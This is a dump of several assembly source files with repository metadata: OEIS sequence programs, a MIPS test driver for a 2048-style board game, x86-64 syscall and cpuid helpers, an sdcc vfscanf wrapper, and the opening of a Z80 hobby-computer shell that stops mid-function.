84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/035/A035038.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/035/A035038.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A035038: a(n) = 2^n - C(n,0) - C(n,1) - ... - C(n,5).
; 0,0,0,0,0,0,1,8,37,130,386,1024,2510,5812,12911,27824,58651,121670,249528,507624,1026876,2069256,4158861,8344056,16721761,33486026,67025182,134116144,268313018,536724316,1073567387,2147277280,4294724471,8589650318,17179537972,34359354200,68719033032,137438443056,274877322009,549755145960,1099510867677,2199022393362,4398045536122,8796091922912,17592184808422,35184370702852,70368742627463,140737486625680,281474974785299,562949951282902,1125899904472688,2251799811064136,4503599624477332
lpb $0
sub $0,1
mov $2,$0
max $2,0
seq $2,2664 ; a(n) = 2^n - C(n,0)- ... - C(n,4).
add $1,$2
lpe
mov $0,$1
| 55.5
| 490
| 0.75976
|
216bc6118cd0c7ea166cf3b27c65dbd6dbecb2c4
| 10,239
|
asm
|
Assembly
|
MIPS/hw4main.asm
|
qiyuanfang1998/CSE220Work
|
75f9a4f32d8ab0cfd5fa7537a1f66d2eaf1929fd
|
[
"BSD-2-Clause"
] | null | null | null |
MIPS/hw4main.asm
|
qiyuanfang1998/CSE220Work
|
75f9a4f32d8ab0cfd5fa7537a1f66d2eaf1929fd
|
[
"BSD-2-Clause"
] | null | null | null |
MIPS/hw4main.asm
|
qiyuanfang1998/CSE220Work
|
75f9a4f32d8ab0cfd5fa7537a1f66d2eaf1929fd
|
[
"BSD-2-Clause"
] | null | null | null |
.data
start_Address: .word 0xffff0000
newline: .asciiz "\n"
lchar: .asciiz "L"
rchar: .asciiz "R"
uchar: .asciiz "U"
dchar: .asciiz "D"
.text
.globl_start
_start:
##########
#1_1 test
##########
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
jal clear_board
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#########
#1_2 test
##@######
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 1
li $t1, 128
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#########
#1_3 test
##@######
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 0
li $t1, 0
li $t2, 1
addi $sp,$sp, -12
sw $t0, 0($sp)
sw $t1, 4($sp)
sw $t2, 8 ($sp)
jal start_game
addi $sp,$sp, 12
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'U'
jal user_move
move $a0, $v0
li $v0,1
syscall
move $a0, $v1
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'D'
jal user_move
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'R'
jal user_move
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 2
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 0
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 1
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 2
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#########
#1_4 test
##@######
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal merge_row
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 1
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 3
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#########
#1_5 test
##@######
li $a0, 0xffff0000
li $a1, 4
li $a2, 4
li $a3, 2
li $t0, 1
addi $sp,$sp,-4
sw $t0, 0($sp)
jal merge_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 0
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 4
li $a2, 4
li $a3, 1
li $t0, 1
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#######
#1_6 test
#########
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_row
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 1
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#######
#1_7 test
#########
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 1
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 1
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 1
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 0
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 0
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 1
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
###
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal merge_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 1
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_col
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_row
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
#####fuckmylifecheckcoltest
###lol
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 0
li $t1, 2
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 1
li $t1, 4
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 2
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 3
li $t1, 16
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 0
li $t1, 16
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 1
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 2
li $t1, 4
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 3
li $t1, 2
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 0
li $t1, 2
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 1
li $t1, 4
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 2
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 3
li $t1, 16
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 0
li $t1, 16
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 1
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 2
li $t1, 4
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 3
li $t0, 3
li $t1, 2
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 0
li $t1, 2
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 1
li $t1, 4
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 2
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 4
li $t0, 3
li $t1, 8
addi $sp,$sp,-8
sw $t0, 0($sp)
sw $t1, 4($sp)
jal place
addi $sp,$sp,8
########### 1.8 test
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
jal check_state
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'U'
jal user_move
move $a0, $v0
li $v0,1
syscall
move $a0, $v1
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'L'
jal user_move
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'R'
jal user_move
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'U'
jal user_move
move $a0, $v0
li $v0,1
syscall
move $a0, $v1
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'U'
jal user_move
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'R'
jal user_move
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'U'
jal user_move
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'D'
jal user_move
li $v0, 10
syscall
move $a0, $v0
li $v0,1
syscall
move $a0, $v1
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 1
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal merge_row
addi $sp,$sp, 4
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 2
li $t0, 0
addi $sp,$sp,-4
sw $t0, 0($sp)
jal shift_row
addi $sp,$sp, 4
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 'U'
jal user_move
li $v0, 10
syscall
li $a0, 0xffff0000
li $a1, 5
li $a2, 4
li $a3, 0
li $t0, 2
li $t1, 1
li $t2, 2
addi $sp,$sp, -12
sw $t0, 0($sp)
sw $t1, 4($sp)
sw $t2, 8 ($sp)
jal start_game
addi $sp,$sp, 12
move $a0, $v0
li $v0,1
syscall
li $v0, 4
la $a0, newline
syscall
li $v0, 10
syscall
.include "hw4.asm"
| 10.394924
| 31
| 0.581697
|
398dfdbd0b685351a2b9d75df5de9a251ac2c9ef
| 265
|
asm
|
Assembly
|
programs/oeis/017/A017281.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/017/A017281.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/017/A017281.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
; A017281: a(n) = 10*n + 1.
; 1,11,21,31,41,51,61,71,81,91,101,111,121,131,141,151,161,171,181,191,201,211,221,231,241,251,261,271,281,291,301,311,321,331,341,351,361,371,381,391,401,411,421,431,441,451,461,471,481,491,501,511,521,531
mov $1,$0
mul $1,10
add $1,1
| 37.857143
| 206
| 0.679245
|
3a9a309019a713803bf8c5464b853c2f49738fed
| 1,235
|
asm
|
Assembly
|
Userland/SampleCodeModule/asm/_lib.asm
|
FrBernad/TPE-ARQUI
|
4aa6e0c9a2778031216244522bff5ac819920ddd
|
[
"BSD-3-Clause"
] | null | null | null |
Userland/SampleCodeModule/asm/_lib.asm
|
FrBernad/TPE-ARQUI
|
4aa6e0c9a2778031216244522bff5ac819920ddd
|
[
"BSD-3-Clause"
] | null | null | null |
Userland/SampleCodeModule/asm/_lib.asm
|
FrBernad/TPE-ARQUI
|
4aa6e0c9a2778031216244522bff5ac819920ddd
|
[
"BSD-3-Clause"
] | 1
|
2021-05-18T18:48:01.000Z
|
2021-05-18T18:48:01.000Z
|
GLOBAL syscall
GLOBAL sys_changeApp
GLOBAL cpuVendor
GLOBAL cpuModel
section .text
%macro pushStateNoRax 0
push rbx
push rcx
push rdx
push rbp
push rdi
push rsi
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
%endmacro
%macro popStateNoRax 0
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rsi
pop rdi
pop rbp
pop rdx
pop rcx
pop rbx
%endmacro
syscall:
push rbp
mov rbp, rsp
pushStateNoRax
mov rax,rdi
mov rdi, rsi
mov rsi,rdx
mov rdx,rcx
mov r10,r8
mov r8,r9
mov r9,[rbp+16]
int 80h
popStateNoRax
mov rsp, rbp
pop rbp
ret
sys_changeApp:
push rbp
mov rbp, rsp
int 81h
mov rsp, rbp
pop rbp
ret
cpuVendor:
push rbp
mov rbp, rsp
push rbx
push rcx
push rdx
mov rax, 0
cpuid
mov [rdi], ebx
mov [rdi + 4], edx
mov [rdi + 8], ecx
mov byte [rdi+12], 0
mov rax,rdi
pop rdx
pop rcx
pop rbx
mov rsp, rbp
pop rbp
ret
cpuModel:
push rbp
mov rbp, rsp
mov rax,0
mov rax,1
cpuid
shr rax,4
and rax,0xF ;0x000000000000000F
mov rsp, rbp
pop rbp
ret
| 10.833333
| 33
| 0.593522
|
482bc93bce558a65497b97e8064651a65fdb4b51
| 645
|
asm
|
Assembly
|
libsrc/stdio/_vfscanf.asm
|
dikdom/z88dk
|
40c55771062b0ea9bb2f0d5b73e2f754fc12b6b0
|
[
"ClArtistic"
] | 1
|
2022-03-08T11:55:58.000Z
|
2022-03-08T11:55:58.000Z
|
libsrc/stdio/_vfscanf.asm
|
dikdom/z88dk
|
40c55771062b0ea9bb2f0d5b73e2f754fc12b6b0
|
[
"ClArtistic"
] | 2
|
2022-03-20T22:17:35.000Z
|
2022-03-24T16:10:00.000Z
|
libsrc/stdio/_vfscanf.asm
|
jorgegv/z88dk
|
127130cf11f9ff268ba53e308138b12d2b9be90a
|
[
"ClArtistic"
] | null | null | null |
MODULE _vfscanf
SECTION code_clib
PUBLIC _vfscanf
EXTERN asm_scanf
; sdcc version
;void vfscanf(FILE *fp, char *fmt,va_list ap)
_vfscanf:
ld hl,7
add hl,sp
ld b,(hl) ;fp
dec hl
ld c,(hl)
dec hl
ld d,(hl) ;fmt
dec hl
ld e,(hl)
dec hl
ld a,(hl) ;fp
dec hl
ld l,(hl)
ld h,a
IF !__CPU_INTEL__
push ix ;save callers
ENDIF
push hl ;fp
ld hl,0 ;sdcc mode
push hl
push de ;fmt
push bc ;ap
call asm_scanf
pop bc
pop bc
pop bc
pop bc
IF !__CPU_INTEL__
pop ix ;restore callers
ENDIF
ret
| 13.4375
| 45
| 0.534884
|
bf0f36128bcb6dc9f68256de164b29a9d8b7db45
| 1,206
|
asm
|
Assembly
|
LegacyMethod/SysInfo/cpuid.asm
|
fengjixuchui/DumpSMBIOS
|
a6add1d625949efc18091da1ed5f02060a61f9cd
|
[
"Unlicense"
] | 121
|
2015-01-06T05:26:38.000Z
|
2022-03-30T06:42:59.000Z
|
LegacyMethod/SysInfo/cpuid.asm
|
fengjixuchui/DumpSMBIOS
|
a6add1d625949efc18091da1ed5f02060a61f9cd
|
[
"Unlicense"
] | 7
|
2015-04-09T20:39:21.000Z
|
2022-03-20T02:23:56.000Z
|
LegacyMethod/SysInfo/cpuid.asm
|
fengjixuchui/DumpSMBIOS
|
a6add1d625949efc18091da1ed5f02060a61f9cd
|
[
"Unlicense"
] | 62
|
2015-04-03T05:46:36.000Z
|
2022-03-30T11:36:44.000Z
|
;; CPUID.ASM - by NujiNuji (MikoMiko)
;; $Id$
.code
;; typedef unsigned int uint32;
;; typedef unsigned __int64 uint64;
;; assert(sizeof(uint32)*8 == 32);
;; assert(sizeof(uint64)*8 == 64);
;; void __fastcall cpuid(uint32 dwOP, uint32 *lpAX, uint32 *lpBX, uint32 *lpCX, uint32 *lpDX);
_cpuid PROC
PUSH RBP
MOV RBP, RSP
;; RSP+30H [lpDX]
;; RSP+28H [ROOM FOR lpCX]
;; RSP+20H [ROOM FOR lpBX]
;; RSP+18H [ROOM FOR lpAX]
;; RSP+14H [PADDING FOR dwOP]
;; RSP+10H [ROOM FOR dwOP]
;; RSP+08H [RETURN-ADDRESS]
;; RSP+00H [RBP]
;; RBP == RSP
MOV DWORD PTR [RBP+10H], ECX
MOV DWORD PTR [RBP+14H], 0
MOV QWORD PTR [RBP+18H], RDX
MOV QWORD PTR [RBP+20H], R8
MOV QWORD PTR [RBP+28H], R9
;; RCX, RDX are volatile
PUSH RBX
PUSH RDI
MOV EAX, DWORD PTR [RBP+10H]
MOV ECX, 0
CPUID
;; EDI = lpAX;
MOV RDI, QWORD PTR [RBP+18H]
;; *EDI = EAX;
MOV DWORD PTR [RDI], EAX
;; *lpBX = EBX;
MOV RDI, QWORD PTR [RBP+20H]
MOV DWORD PTR [RDI], EBX
;; *lpCX = ECX;
MOV RDI, QWORD PTR [RBP+28H]
MOV DWORD PTR [RDI], ECX
;; *lpDX = EDX
MOV RDI, QWORD PTR [RBP+30H]
MOV DWORD PTR [RDI], EDX
POP RDI
POP RBX
XOR RAX, RAX
POP RBP
RET
_cpuid ENDP
PUBLIC _cpuid
END
;; THE END OF FILE
| 17.228571
| 94
| 0.631012
|
79861426d34f5f4fe68ec2e2b053534f1a40c532
| 450
|
asm
|
Assembly
|
oeis/290/A290775.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/290/A290775.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/290/A290775.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A290775: Number of 5-cycles in the n-triangular honeycomb bishop graph.
; Submitted by Jamie Morken(s3)
; 0,0,2,24,138,532,1596,4032,8988,18216,34254,60632,102102,164892,256984,388416,571608,821712,1156986,1599192,2174018,2911524,3846612,5019520,6476340,8269560,10458630,13110552,16300494,20112428,24639792,29986176,36266032,43605408,52142706
mov $1,$0
sub $0,1
pow $0,2
mul $0,2
add $1,2
add $0,$1
bin $1,4
mul $0,$1
sub $0,$1
mul $0,6
div $0,15
| 28.125
| 238
| 0.755556
|
9daa89cde5e596c87e52d11525a32d148b560408
| 969
|
asm
|
Assembly
|
programs/oeis/280/A280514.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | 1
|
2021-03-15T11:38:20.000Z
|
2021-03-15T11:38:20.000Z
|
programs/oeis/280/A280514.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/280/A280514.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
; A280514: Index sequence of the reverse block-fractal sequence A003849.
; 1,2,1,3,2,1,5,4,3,2,1,8,7,6,5,4,3,2,1,13,12,11,10,9,8,7,6,5,4,3,2,1,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126
add $0,1
mov $1,$0
cal $0,246104 ; Least m > 0 for which (s(m), ..., s(n+m-1) = (s(0), ..., s(n)), the first n+1 terms of the infinite Fibonacci word A003849.
sub $0,$1
mov $1,$0
sub $1,1
| 96.9
| 706
| 0.641899
|
4641195570e2bab6c0fb109af0fe0266cd671061
| 20,279
|
asm
|
Assembly
|
V1/src/ashRenew.z80.asm
|
anjennings/Tom80
|
99b58b32b923068c26e8781912ad825978b10f37
|
[
"MIT"
] | 55
|
2021-01-16T16:18:45.000Z
|
2022-03-28T17:58:05.000Z
|
V1/src/ashRenew.z80.asm
|
anjennings/Z80-Computer
|
99b58b32b923068c26e8781912ad825978b10f37
|
[
"MIT"
] | 1
|
2021-03-19T13:38:28.000Z
|
2021-03-19T14:04:13.000Z
|
V1/src/ashRenew.z80.asm
|
anjennings/Z80-Computer
|
99b58b32b923068c26e8781912ad825978b10f37
|
[
"MIT"
] | 8
|
2021-02-07T18:52:32.000Z
|
2022-01-18T07:00:45.000Z
|
;ASH - Aidan's SHell
;32K EEPROM (0x0000 - 0x7FFF)
;32K SRAM (0x8000 - FFFF)
;IO Provided via 16550 UART
;TODO:
;Change most DE to HL
;Change eror to check for non-zero values
;Finish Tokenizer
;Start Parser
;Start Execution Function
STACK_H equ 0xFF
STACK_L equ 0xFF
;First byte of term buf is the size of the term buf
TERM_BUF equ 0x8000
;Maximum size of the buffer
TERM_BUF_MAX equ 256
;////////////////
;UART Registers
;////////////////
UART_DHR equ 0x0 ;UART Data R/W register
UART_IER equ 0x1 ;Interrupt Enable Register
UART_IFR equ 0x2 ;Interrupt ID Reg (READ), FIFO Control Reg (WRITE)
UART_LCR equ 0x3 ;Line Control Register
UART_MCR equ 0x4 ;Modem Control
UART_LSR equ 0x5 ;Line Status Register
UART_MSR equ 0x6 ;Modem Status (Unused)
UART_SCR equ 0x7 ;Arbitrary data can be stored here
;According to the datasheet:
;8 Databits, No parity, 1 Stop
;///////////
;Charactars
;///////////
NEWLINE equ 0xA
RETURN equ 0xD
EOF equ 0x0
NUM0 equ 0x30
NUM1 equ 0x31
NUM2 equ 0x32
NUM3 equ 0x33
NUM4 equ 0x34
NUM5 equ 0x35
NUM6 equ 0x36
NUM7 equ 0x37
NUM8 equ 0x38
NUM9 equ 0x39
;Valid Instructions
SYM_READ equ ":"
SYM_WRITE equ "<"
SYM_EXE equ "@"
SYM_HELP equ "?"
;/////////////////
;Code Starts HERE
;/////////////////
org 0000h
RESET:
;Wait several clocks, then jump directly to MAIN
NOP
NOP
NOP
NOP
JP BOOT
JP BOOT
JP BOOT
JP BOOT
;Not exactly a header, but it will show up in a hex dump
HEADER:
.db NEWLINE, "ASH (Aidan's SHell) 2020", NEWLINE, RETURN, EOF
INTERRUPT:
;//////////////////
;Interrupt Routine
;//////////////////
org 0038h
NOP
NOP
RETI
;//The actual execution starts here
BOOT:
;Set up Stack
LD H, STACK_H
LD L, STACK_L
LD SP, HL
;Set up UART
CALL UART_INIT
;Disable interrupt
IM 1
DI
;Boot Sequence Complete
POSTBOOT:
;Print Boot Screen
LD HL, BOOT_MSG
CALL WRITE_STR
;Print Ready Message
LD HL, READY_MSG
CALL WRITE_STR
;Set Terminal buffer to 0
LD HL, TERM_BUF
LD A, 0
LD (HL), A
MAIN_LOOP:
;CALL GETCH
;CALL EVALUATE_STMT
JP MAIN_LOOP
HALT
;//////////////////////
;//////Functions///////
;//////////////////////
;//////////////////////////////////////
;Set up UART
;//////////////////////////////////////
UART_INIT:
PUSH AF
;Set DLAB=0, just in case
IN A, UART_LCR
AND 7Fh
OUT UART_LCR, A
